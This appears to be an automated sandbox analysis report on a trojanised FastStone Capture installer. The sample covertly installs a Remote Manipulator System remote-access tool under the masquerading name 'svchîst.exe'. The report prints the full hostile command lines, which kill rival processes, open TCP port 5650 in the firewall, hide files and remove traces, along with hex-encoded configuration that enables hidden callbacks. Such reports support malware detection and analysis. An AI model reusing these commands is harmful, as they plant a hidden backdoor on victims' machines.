File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FastStone Capture\FSCaptureHelp.chm C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCrossHair.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSLogo.png C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSRecorder.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCapture.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSFocus.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\FSCapture.LANG C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A
File created C:\Program Files (x86)\FastStone Capture\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = 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 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = 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 C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = 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 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = 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 C:\Windows\SysWOW64\drivers\install.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = 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 C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = 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 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = 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 C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = 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 C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = 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 C:\Windows\SysWOW64\drivers\install.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [hex-encoded XML blob omitted] C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = [hex-encoded XML blob omitted] C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = 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 C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: 33 N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\FastStone Capture\FSCapture.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 336 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 952 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 336 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 708 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\netsh.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 912 wrote to memory of 1000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 708 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe C:\Windows\SysWOW64\route.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 640 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\system32\conhost.exe
PID 1000 wrote to memory of 884 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 884 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

"C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe" /S /IR

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.133

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Windows\SysWOW64\route.exe

route.exe delete 95.141.193.133

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d 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 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f70